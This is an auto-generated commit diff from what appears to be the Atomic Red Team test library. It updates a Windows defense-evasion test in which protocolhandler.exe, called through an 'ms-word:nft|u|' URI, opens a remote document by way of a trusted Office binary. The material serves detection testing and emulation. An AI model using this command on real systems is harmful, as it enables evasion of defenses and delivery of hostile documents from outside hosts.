Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/index.yaml

@@ -40004,10 +40004,6 @@ defense-evasion:
       supported_platforms:
       - windows
       input_arguments:
-        microsoft_wordpath:
-          description: path to office folder
-          type: path
-          default: C:\Program Files\Microsoft Office\root\Office16
         remote_url:
           description: url to document
           type: url
@@ -40018,8 +40014,8 @@ defense-evasion:
           must be provided
 
 '
-        prereq_command: 'if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe")
-          {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
+          Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 
 '
         get_prereq_command: 'write-host "Install Microsoft Word or provide correct
@@ -40029,9 +40025,9 @@ defense-evasion:
       executor:
         name: command_prompt
         elevation_required: false
-        command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
-
-'
+        command: |
+          FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
+          call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
     - name: Microsoft.Workflow.Compiler.exe Payload Execution
       auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
       description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a

atomics/T1218/T1218.md

@@ -192,7 +192,6 @@ Emulates attack via documents through protocol handler in Microsoft Office.  On
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\root\Office16|
 | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx|
 
 
@@ -200,7 +199,8 @@ Emulates attack via documents through protocol handler in Microsoft Office.  On
 
 
 ```cmd
-"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
+FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
+call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 ```
 
 
@@ -210,7 +210,7 @@ Emulates attack via documents through protocol handler in Microsoft Office.  On
 ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1} 
+if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```powershell